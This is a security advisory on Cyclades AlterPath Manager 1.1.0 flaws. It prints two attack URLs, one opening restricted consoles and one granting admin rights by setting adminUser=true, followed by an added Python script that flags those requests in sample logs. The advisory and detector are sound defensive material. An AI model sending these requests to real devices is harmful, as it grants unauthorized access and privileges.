source: https://www.securityfocus.com/bid/12649/info
Cyclades AlterPath Manager is a network device designed to facilitate remote administration of all network-accessible infrastructure resources.
Multiple remote vulnerabilities affect Cyclades AlterPath Manager. These issues are due to various design errors that affect the overall security of the vulnerable device.
The first issue is an information disclosure issue. The second would allow unauthorized access to restricted console resources. Finally the third issue will facilitate privilege escalation.
An attacker may leverage these issues to gain unauthorized access to network-based resources, to gain escalated privileges and to gain access to potentially sensitive information.
It should be noted that although only version 1.1.0 of the software is reported affected by these issues, it is likely earlier versions are affected as well.
To access a restricted console resource:
http://www.example.com/usermode/consoleConnect.jsp?consolename=console_name
To gain escalated privileges:
http://www.example.com/application/saveUser.do?userId=9&password=&userName=my_id&fullName=My+name&department=Security&location=Work&phone=555-1212&mobile=&pager=&email=test%40example.com&status=Enable&localPassword=true&adminUser=true&forward=&action=Save
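
For defenders reviewing web logs from an affected device, the following is an added example (not part of the original advisory and not vendor code) that flags the two request patterns shown above. It assumes the requests are recorded in Common Log Format with the authenticated user name; the log lines, CONSOLE_ACL and ADMINS are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines in Common Log Format (assumed format; the
# advisory does not describe the device's logging).
SAMPLE_LOG = """\
192.0.2.10 - alice [01/Mar/2005:10:00:01 +0000] "GET /usermode/consoleConnect.jsp?consolename=rack1 HTTP/1.1" 200 512
192.0.2.11 - bob [01/Mar/2005:10:02:09 +0000] "GET /usermode/consoleConnect.jsp?consolename=rack7 HTTP/1.1" 200 498
192.0.2.11 - bob [01/Mar/2005:10:05:40 +0000] "GET /application/saveUser.do?userId=9&password=&userName=bob&status=Enable&adminUser=true&action=Save HTTP/1.1" 200 1204
192.0.2.12 - admin [01/Mar/2005:10:06:00 +0000] "GET /application/saveUser.do?userId=4&userName=carol&adminUser=true&action=Save HTTP/1.1" 200 1190
"""

# Hypothetical site data: which consoles each user is assigned, and which
# accounts are allowed to administer users.
CONSOLE_ACL = {"alice": {"rack1"}, "bob": {"rack2"}}
ADMINS = {"admin"}

LINE_RE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def review(log_text):
    """Return (timestamp, user, finding, detail) tuples for suspicious requests."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, user, ts, method, target, status = m.groups()
        url = urlsplit(target)
        params = parse_qs(url.query, keep_blank_values=True)
        if url.path.endswith("/usermode/consoleConnect.jsp"):
            # Direct console request: compare against the user's assignments.
            for name in params.get("consolename", []):
                if name not in CONSOLE_ACL.get(user, set()):
                    findings.append((ts, user, "console-not-assigned", name))
        elif url.path.endswith("/application/saveUser.do"):
            # Account save that sets the admin flag, sent by a non-admin.
            wants_admin = "true" in (v.lower() for v in params.get("adminUser", []))
            if wants_admin and user not in ADMINS:
                target_user = params.get("userName", ["?"])[0]
                findings.append((ts, user, "admin-flag-by-non-admin", target_user))
    return findings

if __name__ == "__main__":
    for finding in review(SAMPLE_LOG):
        print(finding)
```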